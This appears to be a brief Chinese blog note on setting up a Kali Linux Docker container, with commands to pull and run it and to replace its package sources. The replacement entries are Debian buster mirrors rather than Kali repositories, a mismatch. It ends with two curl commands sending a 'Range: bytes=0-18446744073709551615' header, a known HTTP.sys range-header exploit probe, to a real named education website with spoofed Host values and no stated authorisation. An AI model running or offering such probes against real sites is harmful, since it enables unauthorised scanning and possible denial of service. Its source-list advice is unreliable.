KaLi Linux
KaLi Linux
docker pull kalilinux/kali-rolling
docker run -d --name KaLi --hostname KaLi kalilinux/kali-rolling
docker exec -it KaLi /bin/bash
# 更换国内源
echo 'deb http://mirrors.163.com/debian/ buster main non-free contrib\\r\\ndeb http://mirrors.163.com/debian/ buster-updates main non-free contrib\\r\\ndeb http://mirrors.163.com/debian/ buster-backports main non-free contrib\\r\\ndeb-src http://mirrors.163.com/debian/ buster main non-free contrib\\r\\ndeb-src http://mirrors.163.com/debian/ buster-updates main non-free contrib\\r\\ndeb-src http://mirrors.163.com/debian/ buster-backports main non-free contrib\\r\\ndeb http://mirrors.163.com/debian-security/ buster/updates main non-free contrib\\r\\ndeb-src http://mirrors.163.com/debian-security/ buster/updates main non-free contrib\\r\\n' > /etc/apt/sources.list
# 更新系统
apt-get update -y && apt-get upgrade -y
apt update && apt -y install curl net-tools iputils-ping telnet/oldstable
curl http://gkxk.zbvc.edu.cn/ -H "Host: 222.194.183.239" -H "Range: bytes=0-18446744073709551615"
curl http://gkxk.zbvc.edu.cn/ -H "Host: 219.153.116.43" -H "Range: bytes=0-18446744073709551615"
参考1
参考2
评论区